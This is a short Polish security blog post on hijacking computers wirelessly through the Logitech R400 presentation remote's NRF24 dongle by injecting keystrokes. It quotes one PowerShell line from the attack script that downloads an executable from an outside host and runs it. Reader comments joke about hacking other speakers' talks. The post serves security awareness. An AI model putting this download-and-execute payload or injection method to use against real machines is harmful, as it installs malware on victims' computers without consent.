Bezprzewodowe przejmowanie komputera przez pilota do prezentacji Logitech

20 marca 2019, 11:29 | W biegu | 1 komentarz
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Słyszeliście o bezprzewodowym wciskaniu klawiszy na klawiaturze poprzez przejęcie myszki? Taką samą zasadę działania mamy w popularnym pilocie do prezentacji Logitecha:

LOGITECH R400

Nie ma tu wielkiem magii – urządzenie komunikuje się z donglem podobnie jak bardzo duża liczba klawiatur czy mysz – wykorzystując standard NRF24. Stąd taka nieco może egzotyczna metoda komunikacji? Protokół jest szybki (małe opóźnienia), stosowne chipy zapewniające komunikację radiową są ekstremalnie tanie.

Tutaj konkretny skrypcik (udostępniony już jakiś czas temu) odpalający powershella (czyli bezprzewodowo realizowana jest komunikacja do dongla, a ten „wciska” stosowne klawisze na komputerze ofiary):

W skrypcie jest to:

powershell (new-object System.Net.WebClient).DownloadFile('http://ptmd.sy.gs/syss.exe', '%TEMP%\\syss.exe'); Start-Process '%TEMP%\\syss.exe'

Ale oczywiście możliwe są dowolne zmiany.

Co robić? Wpaść na jakąś kolejną konferencję, na której będziemy i zaprezentować coś ciekawego przed publicznością. Potestujemy przejęcie komputera na żywo ;-) Ewentualnie można spróbować użyć mniej popularnych urządzeń opartych o Bluetooth, choć i tutaj istnieją różne ciekawe ataki.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Tony Hołk

    Ja bym jeździł po tych konferencjach i zobaczył, czy nie można zhackować innej prezentacji na sali wykładowej ;)

    Odpowiedz

Odpowiedz